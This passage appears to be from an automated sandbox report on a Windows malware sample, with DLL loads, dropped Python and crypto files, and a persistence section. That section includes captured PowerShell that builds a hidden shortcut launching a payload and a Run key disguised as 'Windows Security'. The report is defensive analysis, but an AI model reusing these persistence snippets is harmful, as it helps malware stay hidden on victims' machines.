                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: synaptics.exe
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4B6C0 _DllMain@12,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,24_2_6BF4B6C0
                Source: libcrypto-1_1.dll.14.drStatic PE information: section name: .00cfg
                Source: libssl-1_1.dll.14.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4C850 push ecx; ret 24_2_6BF4C863
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF6E720 push ecx; ret 24_2_6BF6E733
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6EEC4C36 push ecx; ret 27_2_6EEC4C49
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F8414B5 push ecx; ret 27_2_6F89E953
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73ACE9C1 push ecx; ret 27_2_73ACE9D4
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_73ACEB70 push eax; ret 27_2_73ACEB8E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libssl-1_1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\odbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\pythonservice.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\sqlite3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_chacha20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libcrypto-1_1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\servicemanager.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\libffi-7.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmon.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_Salsa20.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win32.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_decimal.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_asyncio.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\mmapfile.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_des3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_ARC4.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\perfmondata.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\Crypto\Cipher\_raw_cast.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\Icons\README.txt
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\idle_test\README.txt
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\idlelib\README.txt

                Boot Survival

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\xFSOj9El1Q\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() [System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is "System.Management.Automation.CommandNotFoundException")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(".", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion prompt$global:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' -Force @{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} [System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is "System.Management.Automation.CommandNotFoundException")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(".", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion prompt$global:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6BF4B6C0 _DllMain@12,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree,24_2_6BF4B6C0
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
